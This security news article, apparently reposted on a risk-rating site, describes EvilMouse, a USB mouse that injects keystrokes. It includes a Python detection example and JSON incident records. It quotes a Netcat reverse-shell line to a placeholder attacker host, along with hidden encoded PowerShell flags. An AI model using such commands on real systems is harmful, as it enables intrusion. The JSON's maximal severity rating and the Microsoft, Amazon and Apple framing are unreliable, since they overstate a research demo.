Microsoft, Amazon and Apple: $44 “Evilmouse” Can Autonomously Execute Commands and Compromise Systems

EvilMouse: A $44 USB Mouse That Silently Hijacks Systems

Security researcher NEWO-J has unveiled EvilMouse, a low-cost, fully functional USB mouse that covertly injects malicious keystrokes upon connection. Built for under $44 using a Raspberry Pi Pico RP2040 Zero microcontroller, the device exploits trust in everyday peripherals to bypass security measures.

Unlike a suspicious USB drive, EvilMouse retains normal mouse functionality (optical tracking and buttons) while autonomously executing payloads. The build leverages a modified Amazon Basics mouse, a USB hub breakout, and custom firmware to emulate a Human Interface Device (HID), delivering attacks within seconds of connection.

The device executes DuckyScript-like sequences, including:

  • Hidden PowerShell commands (-WindowStyle Hidden -enc)
  • Base64-encoded payloads for obfuscation
  • Reverse shells via Netcat (nc -e cmd.exe attacker_ip 4444)
  • Persistence mechanisms (e.g., scheduled tasks)

In a demo, EvilMouse compromised a Windows 11 system in 5 seconds, granting remote code execution (RCE) without triggering EDR alerts. The attack evades detection by mimicking legitimate user input, exploiting OS auto-enumeration of mice on Windows 11 and macOS Sonoma.

Security Implications

EvilMouse highlights critical gaps in HID trust models, USB hub relay security, and endpoint detection. While designed for red teaming, its low cost ($44 vs. $100+ for commercial tools) democratizes advanced attacks, posing risks to air-gapped and high-security environments.

Potential Defenses

  • USB device whitelisting (Group Policy)
  • Behavioral analytics (e.g., CrowdStrike Falcon’s HID monitoring)
  • Physical port controls (Kensington locks)
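Two triage checks behind the "behavioral analytics" item above, written as an added Python example that is not part of the original article, the EvilMouse project or any vendor's product: flag a device that enumerates as a mouse yet also exposes a keyboard interface, and flag keystroke runs faster than a human can type. The HID usage codes come from the USB HID usage tables; the timing thresholds, the sample device (its VID/PID is made up) and the keystroke timeline are constructed assumptions.

```python
"""Illustrative HID-injection triage heuristics (constructed example)."""
from dataclasses import dataclass
# USB HID Usage Tables: Generic Desktop page and the two usages of interest.
GENERIC_DESKTOP_PAGE = 0x01
USAGE_MOUSE = 0x02
USAGE_KEYBOARD = 0x06


@dataclass
class UsbDevice:
    vid: int
    pid: int
    product: str
    interfaces: list  # (usage_page, usage) per HID interface, from its report descriptor


def is_suspicious_composite(dev: UsbDevice) -> bool:
    """True when one device exposes both a mouse and a keyboard interface.

    Legitimate combo receivers do this too, so use it as a triage signal to
    compare against the device allow-list, not as a verdict on its own.
    """
    usages = {usage for page, usage in dev.interfaces if page == GENERIC_DESKTOP_PAGE}
    return USAGE_MOUSE in usages and USAGE_KEYBOARD in usages


def injected_bursts(timestamps_ms, max_gap_ms=30.0, min_keys=8):
    """Index ranges (first, last) of keystroke runs typed faster than a human.

    A run is reported when every consecutive gap is <= max_gap_ms and it spans
    at least min_keys keys. Both thresholds are assumptions for illustration.
    """
    bursts = []
    run_start = 0
    for i in range(1, len(timestamps_ms) + 1):
        in_run = i < len(timestamps_ms) and timestamps_ms[i] - timestamps_ms[i - 1] <= max_gap_ms
        if not in_run:
            if i - run_start >= min_keys:
                bursts.append((run_start, i - 1))
            run_start = i
    return bursts


# Constructed telemetry: a "mouse" that also enumerates a keyboard (VID/PID made up),
# and a key timeline of human typing, a 12-key scripted burst at 5 ms, then human typing.
SAMPLE_DEVICE = UsbDevice(0x1234, 0x5678, "Generic Optical Mouse", [(0x01, 0x02), (0x01, 0x06)])
SAMPLE_KEYSTROKES_MS = ([0, 180, 310, 520, 640, 800]
                        + [3000 + 5 * i for i in range(12)]
                        + [4500 + 200 * i for i in range(5)])
```

Feeding real enumeration and input telemetry to these two functions is left to the endpoint agent; the constructed sample yields one composite-device hit and one scripted burst covering keys 6 through 17.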

The project’s GitHub repository (NEWO-J/evilmouse) includes extensible code for DuckyScript compatibility, Rust-based keystroke acceleration, and persistence techniques. Future enhancements may include remote activation via magic packets and AMSI bypasses.

EvilMouse underscores the growing threat of hardware-based attacks disguised as innocuous peripherals, forcing organizations to rethink peripheral supply chain security.

Source: https://cyberpress.org/44-evilmouse-can-autonomously-execute-commands-and-compromise-systems/

Microsoft TPRM report: https://www.rankiteo.com/company/microsoft-security-response-center

Amazon TPRM report: https://www.rankiteo.com/company/amazon

Apple TPRM report: https://www.rankiteo.com/company/apple

{
  "id": "amaappmic1770935300",
  "linkid": "amazon, apple, microsoft-security-response-center",
  "type": "Vulnerability",
  "date": "2/2026",
  "severity": "100",
  "impact": "5",
  "explanation": "Attack threatening the organization's existence"
}

{
  "affected_entities": [{"type": "General Public, Organizations"}],
  "attack_vector": "USB Human Interface Device (HID) Exploitation",
  "description": "Security researcher NEWO-J unveiled EvilMouse, a low-cost, fully functional USB mouse that covertly injects malicious keystrokes upon connection. Built for under $44 using a Raspberry Pi Pico RP2040 Zero microcontroller, the device exploits trust in everyday peripherals to bypass security measures. The device retains normal mouse functionality while autonomously executing payloads, including hidden PowerShell commands, reverse shells, and persistence mechanisms.",
  "impact": {
    "operational_impact": "Remote code execution (RCE), potential system compromise",
    "systems_affected": "Windows 11, macOS Sonoma"
  },
  "lessons_learned": "EvilMouse highlights critical gaps in HID trust models, USB hub relay security, and endpoint detection. Organizations need to rethink peripheral supply chain security and implement defenses like USB device whitelisting and behavioral analytics.",
  "motivation": "Demonstration of hardware-based attack vectors, red teaming",
  "post_incident_analysis": {
    "corrective_actions": "Implement USB device whitelisting, behavioral analytics, and physical port controls",
    "root_causes": "Exploitation of OS auto-enumeration of HID devices, lack of peripheral trust models, and endpoint detection gaps"
  },
  "recommendations": [
    "USB device whitelisting (Group Policy)",
    "Behavioral analytics (e.g., CrowdStrike Falcon’s HID monitoring)",
    "Physical port controls (Kensington locks)"
  ],
  "references": [{"source": "GitHub Repository", "url": "https://github.com/NEWO-J/evilmouse"}],
  "response": {"enhanced_monitoring": "Behavioral analytics (e.g., CrowdStrike Falcon’s HID monitoring)"},
  "threat_actor": "NEWO-J (Security Researcher)",
  "title": "EvilMouse: A $44 USB Mouse That Silently Hijacks Systems",
  "type": "Hardware-based Attack",
  "vulnerability_exploited": "OS auto-enumeration of mice on Windows 11 and macOS Sonoma, lack of HID trust models"
}